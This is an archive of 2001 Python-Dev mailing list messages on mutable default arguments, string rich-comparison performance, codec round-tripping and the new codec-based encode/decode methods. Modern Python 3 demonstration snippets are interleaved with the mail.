Subject: [Python-Dev] Bug report: empty dictionary as default class argument
In-Reply-To: <200105160756.KAA29616@alpha.netvision.net.il>
References: <200105160756.KAA29616@alpha.netvision.net.il>
Message-ID: <m3sni51zb5.fsf@lambda.garshol.priv.no>

* Idan Sofer
| 
| If a class has an argument with a default of an empty dictionary,
| then all instances of the same class will point to the same
| dictionary, unless the dictionary is explicitly defined by the
| constructor.

This is part of the language semantics, and so not a bug. The default
values of optional arguments are evaluated once, when the def
statement defining the function/method is executed, not on each call.
You may consider the semantics ill-advised, but it is intentional.
 
| class foo:
|     
|     def __init__(self,attribs={}):
| 	self.attribs=attribs;
| 	return None;

I usually write this as:

class Foo:

  def __init__(self, attribs = None):
    self.attribs = attribs or {}
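Below is a short Python 3 demonstration of the sharing. It also includes a variant of the idiom above that tests for None explicitly. That variant is a stylistic choice, not something the thread prescribes. It keeps a caller's own empty dict instead of replacing it.

```python
class Shared:
    def __init__(self, attribs={}):   # one dict, created when `def` runs
        self.attribs = attribs


class Fresh:
    def __init__(self, attribs=None):
        # Test for None explicitly: `attribs or {}` would also swap a
        # caller's own empty dict for a new one.
        self.attribs = {} if attribs is None else attribs


a, b = Shared(), Shared()
a.attribs["colour"] = "red"
print(b.attribs)              # {'colour': 'red'}: the default is shared

c, d = Fresh(), Fresh()
c.attribs["colour"] = "red"
print(d.attribs)              # {}: each instance gets its own dict
```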

--Lars M.


From fredrik at pythonware.com  Wed May 16 10:18:44 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Wed, 16 May 2001 10:18:44 +0200
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
References: <200105160756.KAA29616@alpha.netvision.net.il>
Message-ID: <011401c0dde0$d4adb2e0$0900a8c0@spiff>

Idan Sofer wrote:
>
> I have found a rather annoying bug in Python, present in both Python 1.5
> and Python 2.0.
>
> If a class has an argument with a default of an empty dictionary, then
> all instances of the same class will point to the same dictionary,
> unless the dictionary is explicitly defined by the constructor.

maybe you should check the documentation (or the FAQ) before
submitting bugs?

    http://www.python.org/doc/current/ref/function.html

    Default parameter values are evaluated when the function
    definition is executed. This means that the expression is evaluated
    once, when the function is defined, and that that same ``pre-
    computed'' value is used for each call. This is especially important
    to understand when a default parameter is a mutable object,
    such as a list or a dictionary: if the function modifies the object
    (e.g. by appending an item to a list), the default value is in
    effect modified.

Cheers /F

PS. when you do report real bugs, please use the bug tracker:

    http://sourceforge.net/tracker/?group_id=5470&atid=105470

"is this a bug" questions should be sent to comp.lang.python


From tim.one at home.com  Wed May 16 10:41:47 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 04:41:47 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>

[Martin]
> Producing numbers is easy :-)

If only making sense of them were too <0.6 wink>.

> I've instrumented my version where string implements richcmp, and
> special-cases everything I can think of.

1. String objects are also equal despite being different objects,
   if their ob_sinterned pointers are equal and non-NULL.  So if
   you're looking for every trick in & out of the book, that's
   another one.

2. But the real goal is to add only those special cases that in
   combination yield the largest net win, and that's much harder
   to determine (since there are no typical apps, and it's very
   hard to quantify the tradeoffs here in a credible x-platform
   x-app way).

> Counting is done for running the test suite. With this, I get
>
> Calls to string_richcompare:   2378660
> Calls with different types:      33992 (ie. one is not a string)
> Calls with identical strings:   120517
> Calls where lens decide !EQ:   1775716
> ----------------------------
> Calls richcmp -> oldcomp:       448435
> Total calls to oldcomp:        1225643
> Calls oldcomp -> memcmp:        860174
>
> So 5% of the calls are with identical strings, for which I can
> immediately decide the outcome.

But also at the cost of doing a fruitless compare and branch in 95% of calls.
There isn't enough data to guess whether this is a net win or a net loss
(compared to leaving this special case out).

Note that if the "identical string pointers" special case is a net win, it
would be effective inside oldcomp instead (i.e., you don't need a richcompare
slot to exploit it); indeed, it may be more effective there, since there are
some 800,000 calls to oldcmp that *didn't* come from richcmp, and oldcmp
doesn't check for pointer equality now (but PyObject_Compare does, so there
didn't *used* to be any point to it in oldcmp).

Any idea where those 800,000 virgin calls to oldcomp are coming from?  That's
a lot.

> 75% can be decided in terms of the string lengths, which leaves ca. 19%
> for cases where lexicographical comparison is needed.

So about 1 in 5 times there's also the additional (wrt just calling oldcmp
all the time) overhead of a second function call (i.e., the call to oldcmp
made by richcmp).

> In those cases, the first byte decides in 30%. If I remove the test
> for "len decides !EQ", I get
>
> #riches:                       2358322
> #riches_ni:                      34108
> #idents_decide:                 102050
> #lens_decide:                        0
> --------------------------------------
> rest(computed):                2222164
> #comps:                        2949421
> #memcmps:                       917776
>
> So still, ca. 30% can be decided by first byte.

Sorry, I couldn't follow this part, except noting that 917776 is about 30% of
2949421, in which case I would have expected you to say that 70% can be
decided by first byte.

> It still appears that the total number of calls to memcmp is higher
> when the length is not taken into consideration.

Since 917776 is larger than the earlier 860174, isn't that plain?  BTW, some
compilers inline memcmp, so assuming it's "a call" is an x-platform trap; of
course assuming it *isn't* is also an x-platform trap.

> To verify this claim, I've counted the cases where the length
> decides the outcome, but looking at the first byte also had:
>
> lens_decide:                    1784897
> lens_decide_firstbyte_wouldhave:1671148
>
> So in 6% of the cases, checking the length alone gives a decision
> which looking at the first byte doesn't; plus it saves a function
> call.

OTOH, 19% of all richcmp calls ended up calling oldcmp too, so the *net*
effect is muddy at best.
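The trade-off is easier to see as code. Below is a hypothetical Python sketch over bytes objects of the checks counted above: identity, length, first byte, then a full compare. It is a model, not CPython's C code. Every early exit it adds is one more test paid by the calls that exit does not decide.

```python
from collections import Counter


def string_eq(a, b, stats):
    """Model of the equality fast paths discussed above (not CPython's code).

    `a` and `b` are bytes objects; `stats` counts which check decided.
    """
    if a is b:                    # same object, e.g. two interned strings
        stats["identical"] += 1
        return True
    if len(a) != len(b):          # unequal lengths can only mean !EQ
        stats["length"] += 1
        return False
    if a[:1] != b[:1]:            # first byte differs
        stats["first_byte"] += 1
        return False
    stats["full_compare"] += 1    # fall back to a memcmp-style comparison
    return a == b


stats = Counter()
s = b"spam"
pairs = [(s, s), (b"spam", b"eggs!"), (b"spam", b"eggs"), (b"spam", b"spat")]
print([string_eq(x, y, stats) for x, y in pairs])  # [True, False, False, False]
print(dict(stats))
```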

> To support the thesis that Py_EQ is the common case for strings, I
> counted the various operations:
>
> pyEQ:2271593
> pyLE:9234
> pyGE:0
> pyNE:20470
> pyLT:22765
> pyGT:578

This clearly wasn't doing much sorting of strings (or of tuples containing
strings, etc) -- .sort() never uses pyEQ (it only uses pyLT).
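Python's sort and the bisect module are defined in terms of < alone. This is easy to confirm in modern Python 3 with a hypothetical `Key` class that logs every comparison method invoked:

```python
import bisect


class Key:
    """Hypothetical wrapper that logs which comparison methods get called."""
    log = []

    def __init__(self, v):
        self.v = v

    def __lt__(self, other):
        Key.log.append("lt")
        return self.v < other.v

    def __eq__(self, other):
        Key.log.append("eq")
        return self.v == other.v

    def __gt__(self, other):
        Key.log.append("gt")
        return self.v > other.v


items = sorted([Key(3), Key(1), Key(2)])
bisect.insort(items, Key(2))
print([k.v for k in items], set(Key.log))  # [1, 2, 2, 3] {'lt'}
```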

> Now, that might be flawed since comparing strings for equal is
> extremely frequent in the testsuite. To give more credibility to the
> data, I also ran setup.py with my instrumented ./python:

In the absence of non-trivial use of sorting or the bisect module or one of
the search tree modules out there, it's easy to buy that PyEQ is most common
for strings.  What's not clear is that adding a rich comparison slot actually
helps overall (as compared to continuing to let string_compare() handle it,
and if the pointer equality test actually saves more than it costs, adding it
there instead).  It's clearer that this is going to hurt sorting (& bisect
etc), by adding yet another layer of function call to get Py_LT resolved (as
for dict compares too, the string richcmp can't do anything to speed up Py_LT
that string oldcmp can't do just as efficiently -- indeed, that's the great
advantage oldcmp's "compare first character" test had:  that *can* decide
Py_LT in one byte much of the time (but length comparison cannot)).

Note too earlier mail about how adding a richcmp slot to strings will
suddenly slow cmp(string1, string2) (which is the usual way to program a
search tree, because cmp() *used* to call a string comparison routine only
once; but after adding a richcmp slot, each cmp(string1, string2) will call
the richcmp slot from 1 thru 3 times (data-dependent)).

> ...
> That shows that optimizing for Py_NE is not worth it. With these data,
> I'll upload a patch to SF.

Which is here:

http://sourceforge.net/tracker/index.php?func=detail&aid=424335&group_id=5470&atid=305470

Heh:  let's grab all the ugly URLs off of SourceForge, stick them in a giant
list, and sort them.  Can't think of a more typical app than that <wink>.

Thanks for the work, Martin!


From tim.one at home.com  Wed May 16 10:51:17 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 04:51:17 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.46090.203278.397835@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEHPKCAA.tim.one@home.com>

[Barry A. Warsaw]
> ...
> from types import StringType
> import time
> r = range(1000000)
>
> def one(r=r):
>     x = 'hello'
>     t0 = time.time()
>     for i in r:

Random clue:  when you're too lazy to try to subtract out loop overhead (not a
knock, I am too), you may have better luck with

    r = [1] * 1000000

than

    r = range(1000000)

The reason is that the former way gets to keep incref'ing and decref'ing a
single object (as it's repeatedly bound to "i" across iterations), instead of
slobbering all over memory inc'ing and dec'ing a million distinct objects.
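Later Pythons package both ideas in the timeit module. As far as I know, its timing loop iterates over `itertools.repeat(None, number)`, which is the same one-object trick. Subtracting an empty-loop measurement then takes one more call. Here is a Python 3 sketch with a hypothetical `per_loop_cost()` helper:

```python
import timeit


def per_loop_cost(stmt, setup="pass", number=1_000_000):
    """Seconds per iteration of `stmt`, minus the cost of an empty loop.

    Timing noise can make the result slightly negative for very cheap stmts.
    """
    with_stmt = timeit.timeit(stmt, setup=setup, number=number)
    empty = timeit.timeit("pass", number=number)
    return (with_stmt - empty) / number


print(per_loop_cost("x == y", setup="x = 'hello'; y = 'world'"))
```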

there's-an-art-to-doing-nothing-quickly-ly y'rs  - tim


From tim.one at home.com  Wed May 16 10:56:56 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 04:56:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010515222738.A9996@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>

[poor Tim]
> In Python terms, those are Pythong lon (unbounded) ints today
                             ^^^^^^^
[Greg Ewing]
> What Pythonistas wear on their feet?

[Eric S. Raymond]
> No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.

Eric wins!  That's indeed what I was thinking of.  I'm surprised nobody asked
what a lon was.  But not as surprised that I didn't try to blame this on an
Outlook 2000 bug.

> (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> phone numbers.  Pthfthfthpht...)

Too much work anyway.  They can have mine:  703 758 8258.

but-they-better-*really*-love-python-cuz-i-give-quizzes-ly y'rs  - tim


From esr at thyrsus.com  Wed May 16 11:17:09 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 16 May 2001 05:17:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>; from tim.one@home.com on Wed, May 16, 2001 at 04:56:56AM -0400
References: <20010515222738.A9996@thyrsus.com> <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>
Message-ID: <20010516051709.C11602@thyrsus.com>

Tim Peters <tim.one at home.com>:
> [poor Tim]
> > In Python terms, those are Pythong lon (unbounded) ints today
>                              ^^^^^^^
> [Greg Ewing]
> > What Pythonistas wear on their feet?
> 
> [Eric S. Raymond]
> > No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.
> 
> Eric wins!  That's indeed what I was thinking of.  I'm surprised nobody asked
> what a lon was.  But not as surprised that I didn't try to blame this on an
> Outlook 2000 bug.
> 
> > (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> > phone numbers.  Pthfthfthpht...)
> 
> Too much work anyway.  They can have mine:  703 758 8258.

Hmmm...now, which one of them should I try to talk into a snakeskin bikini?

Duh.  Answer obvious: the one I can talk *out* of a snakeskin bikini most 
rapidly afterwards.  Then I'll give her your number -- that is, if
I don't get too, er, distracted.

	seeming-like-a-good-time-to-practice-my-Timlike-wink'ly yours,
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Every Communist must grasp the truth, 'Political power grows out of
the barrel of a gun.'
        -- Mao Tse-tung, 1938, inadvertently endorsing the Second Amendment.


From mal at lemburg.com  Wed May 16 11:29:49 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:29:49 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCGEHLKCAA.tim.one@home.com>
Message-ID: <3B02488D.415BA95F@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Round-tripping is obviously very important if you use Unicode
> > as basis for working on text.
> 
> Since I use 7-bit ASCII exclusively, I've been using
> 
>     encode = decode = lambda x: x
> 
> I haven't proved that's round-trippable, but haven't bumped into an exception
> yet.

For character map codecs the complete range(256) of possible
input characters should pass the round-trip test, that is

	encoded text -> Unicode -> encoded text

should result in the identity mapping for all c in map(chr,range(256)).
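The round-trip property can be checked mechanically. Here is a minimal Python 3 sketch with a hypothetical `roundtrip_failures()` helper. It decodes each of the 256 possible bytes and re-encodes it. It collects every byte that either raises or comes back different.

```python
def roundtrip_failures(encoding):
    """Return the byte values b for which decode-then-encode is not identity."""
    failures = []
    for b in range(256):
        raw = bytes([b])
        try:
            if raw.decode(encoding).encode(encoding) != raw:
                failures.append(b)
        except UnicodeError:          # undefined in one direction or the other
            failures.append(b)
    return failures


print(roundtrip_failures("latin-1"))        # []
print(len(roundtrip_failures("ascii")))     # 128: bytes 0x80-0xFF don't decode
```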
 
> > I don't know about the reasoning behind making cp875 fail the
> > round-trip -- Unicode certainly provides means to make mappings
> > round-trip safe (e.g. by reverting to the private Unicode
> > char. point areas).
> 
> Then I ignorantly but confidently (indeed, with the cheery confidence only
> the truly ignorant can truly enjoy!) vote for your approach that maps the
> non-round-trippable cp875 code points to None.  Better safe than sorry, by
> default.  Else 6 of the 7 ambiguous chars will be silent surprises by
> default.

I will check in a patch which moves the building logic for encoding
maps to codecs.py. This will simplify the task of choosing the
"right" solution. Currently I'm in favour of:

def make_encoding_map(decoding_map):

    """ Creates an encoding map from a decoding map.

        If a target mapping in the decoding map occurs multiple
        times, then that target is mapped to None (undefined mapping),
        causing an exception when encountered by the charmap codec
        during translation.

        One example where this happens is cp875.py which decodes
        multiple characters to \u001a.

    """
    m = {}
    for k,v in decoding_map.items():
        if not m.has_key(v):
            m[v] = k
        else:
            m[v] = None
    return m

Perhaps we should also have a codecs.finalize_decoding_map() API
in codecs.py which checks the decoding map and postprocesses
it in case it finds a problem ?!
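The same logic can be run on current Python. The port below uses the `in` operator in place of `dict.has_key()`, which Python 3 removed. It is exercised on a made-up three-entry decoding map; the byte values are illustrative, not cp875's real table. `codecs.charmap_encode()` is the function the generated charmap codecs call, and it treats a None entry as an undefined mapping.

```python
import codecs


def make_encoding_map(decoding_map):
    """Invert a decoding map; targets that occur more than once map to None."""
    m = {}
    for k, v in decoding_map.items():
        if v not in m:
            m[v] = k
        else:
            m[v] = None   # ambiguous: leave undefined so encoding fails loudly
    return m


# Hypothetical decoding map: two different bytes both decode to U+001A.
decoding_map = {0x3F: 0x1A, 0xFF: 0x1A, 0x41: 0x41}
encoding_map = make_encoding_map(decoding_map)
print(encoding_map)                                        # {26: None, 65: 65}
print(codecs.charmap_encode("A", "strict", encoding_map))  # (b'A', 1)
try:
    codecs.charmap_encode("\x1a", "strict", encoding_map)
except UnicodeEncodeError as exc:
    print("undefined mapping:", exc.reason)
```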

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Wed May 16 11:32:36 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:32:36 +0200
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
		<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
		<200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>
Message-ID: <3B024934.58232325@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Sounds like we ought to do a search-and-destroy on type comparisons,
> > replacing with isinstance() where possible.
> 
> At least in my applications, this is unfortunately not possible: I
> want a test for byte-string-or-unicode-string. This could be done with
> two isinstance calls, but that is certainly less efficient.
> 
> Marc-Andre once proposed a type representing the immediate supertype
> of both byte strings and unicode strings; let's call it abstract string.
> Then I could write isinstance(e, types.AbstractString).

I'm still holding on to that idea... hopefully, Guido's type
checkins will make this possible in 2.2 or 2.3. The same
should then be done for numbers, sequences and mappings (all
abstract "types" defined in abstract.c).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Wed May 16 11:34:40 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:34:40 +0200
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
Message-ID: <3B0249B0.5DD10A4C@lemburg.com>

Tim Peters wrote:
> 
> [Martin]
> > Producing numbers is easy :-)
> 
> If only making sense of them were too <0.6 wink>.

FYI, I've added a few compare tests to pybench which now is
available as version 0.9. You can download it from my Python
page.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mwh at python.net  Wed May 16 12:53:16 2001
From: mwh at python.net (Michael Hudson)
Date: 16 May 2001 11:53:16 +0100
Subject: [Python-Dev] Easy codec access
In-Reply-To: Guido van Rossum's message of "Tue, 15 May 2001 11:35:09 -0500"
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com>
Message-ID: <m31yppo99f.fsf@atrus.jesus.cam.ac.uk>

Guido van Rossum <guido at digicool.com> writes:

> > I've just checked in a set of patches which implement the new
> > .decode() method along with a couple of useful codecs.
> 
> Cool!

Indeed.  Good idea, Marc!

This is a bit unfriendly though:

>>> "bobbins".encode("gzip")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
    raise SystemError,\
SystemError: module "encodings.gzip" failed to register

I thought SystemErrors shouldn't ever happen (isn't it what gets
raised for an illegal opcode, for example?).
 
> > To see just how easy it is to write codecs, please have
> > a look at the string codecs I added in this patch (e.g.
> > zlib_codec.py or hex_codec.py). I am pretty sure that there
> > are a lot more useful things in the standard lib which could
> > benefit from these easy-to-use interfaces.
> 
> As an exercise, I added a quoted-printable codec.  It was easy
> indeed!

urlencode would be nice.  Maybe re.escape, too.  html entities?
That's probably a bigger can of worms, but 

print "<p>%s</p>"%text.encode("html")

seems delightfully simpleminded.
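In Python 3, `str.encode()` must produce bytes. A text-to-text transform like this would therefore be reached through `codecs.encode()`, the way the bundled rot13 codec is. Here is a minimal sketch that registers a codec under the hypothetical name "htmlsketch" and delegates the escaping to the standard `html` module:

```python
import codecs
import html


def _encode(text, errors="strict"):
    # Codec functions return (output, number of input items consumed).
    return html.escape(text, quote=True), len(text)


def _decode(text, errors="strict"):
    return html.unescape(text), len(text)


def _search(name):
    # Search functions return a CodecInfo for names they know, else None.
    if name == "htmlsketch":
        return codecs.CodecInfo(_encode, _decode, name="htmlsketch")
    return None


codecs.register(_search)

text = "fish & chips"
print("<p>%s</p>" % codecs.encode(text, "htmlsketch"))  # <p>fish &amp; chips</p>
```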

Cheers,
M.

-- 
  GAG: I think this is perfectly normal behaviour for a Vogon. ...
VOGON: That is exactly what you always say.
  GAG: Well, I think that is probably perfectly normal behaviour for a
      psychiatrist. -- The Hitch-Hikers Guide to the Galaxy, Episode 9


From mal at lemburg.com  Wed May 16 13:06:14 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 13:06:14 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3B025F26.A625DE02@lemburg.com>

Michael Hudson wrote:
> 
> Guido van Rossum <guido at digicool.com> writes:
> 
> > > I've just checked in a set of patches which implement the new
> > > .decode() method along with a couple of useful codecs.
> >
> > Cool!
> 
> Indeed.  Good idea, Marc!

Thanks :-)
 
> This is a bit unfriendly though:
> 
> >>> "bobbins".encode("gzip")
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
>   File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
>     raise SystemError,\
> SystemError: module "encodings.gzip" failed to register
> 
> I thought SystemErrors shouldn't ever happen (isn't it what gets
> raised for an illegal opcode, for example?).

This is due to the zlib module not being installed. The reason
for the search function in encodings/__init__.py raising a
SystemError is that it did find a module named gzip, but this
module does not export the needed registration API getregentry().

Perhaps it should just raise a LookupError instead, though...
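Here is a sketch of that suggestion in Python 3. It uses stand-in module objects; the `find_codec()` name and the `modules` table are hypothetical, not the real encodings/__init__.py. The unknown-name case and the not-a-codec case raise the same LookupError. I believe later versions of the encodings package take essentially this approach and treat a module without getregentry as a miss.

```python
from types import SimpleNamespace


def find_codec(name, modules):
    """Hypothetical lookup step; `modules` maps names to candidate modules."""
    module = modules.get(name)
    getregentry = getattr(module, "getregentry", None)
    if getregentry is None:
        # Unknown name and "module exists but is not a codec" both end up here,
        # so the user sees one consistent LookupError instead of a SystemError.
        raise LookupError("unknown encoding: %s" % name)
    return getregentry()


modules = {
    "hex": SimpleNamespace(getregentry=lambda: ("enc", "dec")),  # a codec module
    "sys": SimpleNamespace(version="2.1"),                       # not a codec
}
print(find_codec("hex", modules))  # ('enc', 'dec')
```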
 
> > > To see just how easy it is to write codecs, please have
> > > a look at the string codecs I added in this patch (e.g.
> > > zlib_codec.py or hex_codec.py). I am pretty sure that there
> > > are a lot more useful things in the standard lib which could
> > > benefit from these easy-to-use interfaces.
> >
> > As an exercise, I added a quoted-printable codec.  It was easy
> > indeed!
> 
> urlencode would be nice.  Maybe re.escape, too.  html entities?
> That's probably a bigger can of worms, but
> 
> print "<p>%s</p>"%text.encode("html")
> 
> seems delightfully simpleminded.

Right. That's the idea... volunteers are welcome :-) 

There are lots of those little "escape this, encode that" tasks 
which could benefit from the codec machinery. The ones you
mention would certainly be good candidates. pickle and marshal
would also be good to have wrapped as codecs.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mwh at python.net  Wed May 16 13:19:15 2001
From: mwh at python.net (Michael Hudson)
Date: 16 May 2001 12:19:15 +0100
Subject: [Python-Dev] Easy codec access
In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 16 May 2001 13:06:14 +0200"
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <m31yppo99f.fsf@atrus.jesus.cam.ac.uk> <3B025F26.A625DE02@lemburg.com>
Message-ID: <m3y9rxmtho.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal at lemburg.com> writes:

> > This is a bit unfriendly though:
> > 
> > >>> "bobbins".encode("gzip")
> > Traceback (most recent call last):
> >   File "<stdin>", line 1, in ?
> >   File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
> >     raise SystemError,\
> > SystemError: module "encodings.gzip" failed to register
> > 
> > I thought SystemErrors shouldn't ever happen (isn't it what gets
> > raised for an illegal opcode, for example?).
> 
> This is due to the zlib module not being installed. 

No it's not, actually.  I *thought* I was getting the error message
because the zlib encoding doesn't alias itself to gzip (whether it
should or not is another question).  But in fact if you specify a
bogus encoding you get a nice error message:

>>> "bobbins".encode("nonesuch")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
LookupError: unknown encoding

but:

>>> "bobbins".encode("sys")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
    raise SystemError,\
SystemError: module "encodings.sys" failed to register

I have to admit I don't really know what's going on here, but the
error is just confusing.

> The reason for the search function in encodings/__init__.py raising
> a SystemError is that it did find a module named gzip, but this
> module does not export the needed registration API getregentry().

Yep.  

> Perhaps it should just raise a LookupError instead, though...

Might be easiest.

> > urlencode would be nice.  Maybe re.escape, too.  html entities?
> > That's probably a bigger can of worms, but
> > 
> > print "<p>%s</p>"%text.encode("html")
> > 
> > seems delightfully simpleminded.
> 
> Right. That's the idea... volunteers are welcome :-) 

Maybe this evening.

> There are lots of those little "escape this, encode that" tasks 
> which could benefit from the codec machinery. The ones you
> mention would certainly be good candidates. pickle and marshal
> would also be good to have wrapped as codecs.

Ooh yes, hadn't thought of them.

'YW5vdGhlci1mdW4tdG95\n'.decode("base64")-ly y'rs
M.

-- 
  There's an aura of unholy black magic about CLISP.  It works, but
  I have no idea how it does it.  I suspect there's a goat involved
  somewhere.                     -- Johann Hibschman, comp.lang.scheme


From aahz at rahul.net  Wed May 16 15:16:18 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Wed, 16 May 2001 06:16:18 -0700 (PDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010515222738.A9996@thyrsus.com> from "Eric S. Raymond" at May 15, 2001 10:27:38 PM
Message-ID: <20010516131618.C40CC99C91@waltz.rahul.net>

Eric S. Raymond wrote:
> 
> (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> phone numbers.  Pthfthfthpht...)

That's okay, I have their e-mail addresses.  Wanna bet on which of us
gets a response first?
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From barry at digicool.com  Wed May 16 15:42:15 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 16 May 2001 09:42:15 -0400
Subject: [Python-Dev] Comparison speed
References: <15105.46090.203278.397835@anthem.wooz.org>
	<LNBBLJKPBEHFEDALKOLCAEHPKCAA.tim.one@home.com>
Message-ID: <15106.33719.14403.13051@anthem.wooz.org>

>>>>> "TP" == Tim Peters <tim.one at home.com> writes:

    TP> Random clue: when you're too lazy to try to subtract out loop
    TP> overhead (not a knock, I am too), you may have better luck
    TP> with

    TP>     r = [1] * 1000000

    TP> than

    TP>     r = range(1000000)

Ah, good point!
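Tim's tip is about keeping per-iteration loop overhead out of a timing. The sketch below uses the standard `timeit` module and goes one step further by subtracting the cost of an empty statement. `net_time` is a hypothetical helper name. The subtraction is only an approximation, so on a noisy machine the result can even come out slightly negative.

```python
import timeit

def net_time(stmt, setup="pass", number=100_000, repeat=5):
    """Approximate seconds spent running `stmt` `number` times, minus loop overhead.

    Takes the best of `repeat` runs for both the statement and an empty
    `pass` baseline, and returns the difference.
    """
    baseline = min(timeit.repeat("pass", setup=setup, number=number, repeat=repeat))
    gross = min(timeit.repeat(stmt, setup=setup, number=number, repeat=repeat))
    return gross - baseline

# Bind the operands in setup so the comparison isn't a constant expression.
print(net_time("a < b", setup="a, b = 'ab', 'cd'"))
```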


From guido at digicool.com  Wed May 16 17:01:40 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 10:01:40 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Wed, 16 May 2001 09:28:45 +0200."
             <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> 
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com> <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com>  
            <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> 
Message-ID: <200105161501.KAA02226@cj20424-a.reston1.va.home.com>

> Marc-Andre once proposed a type representing the immediate supertype
> of both byte strings and unicode strings; let's call it abstract string.
> Then I could write isinstance(e, types.AbstractString).

This will probably be doable in 2.2.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May 16 17:24:55 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 10:24:55 -0500
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: Your message of "Tue, 15 May 2001 20:01:05 -0400."
             <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com> 
Message-ID: <200105161524.KAA02518@cj20424-a.reston1.va.home.com>

> The question remaining is how much of this list/tuple richcmp behavior is
> guaranteed by the language and how much is just implementation-dependent
> fuzz.

Unclear what you're asking.  The language doesn't require any
particular semantics for sequence comparisons, but the language of
course includes the tuple and list sequence types, and it describes
(albeit lacking some rigorous detail) what comparisons for those do.
If there are specific lacks of detail, it probably helps to think
about filling those in.

> For a more vanilla example, I removed the EQ/NE "lengths differ?"
> tuple richcmp early-exit test because I never found code that made
> it trigger (but tons of code that gets there without triggering).
> But this has semantic implications too: an implementation without
> the early exit may call user-defined comparison routines that raise
> exceptions when comparing tuples of different lengths now.  Do you
> care?  (I don't.)

I don't care about exceptions either in this case; the shortcut seems
fair game.



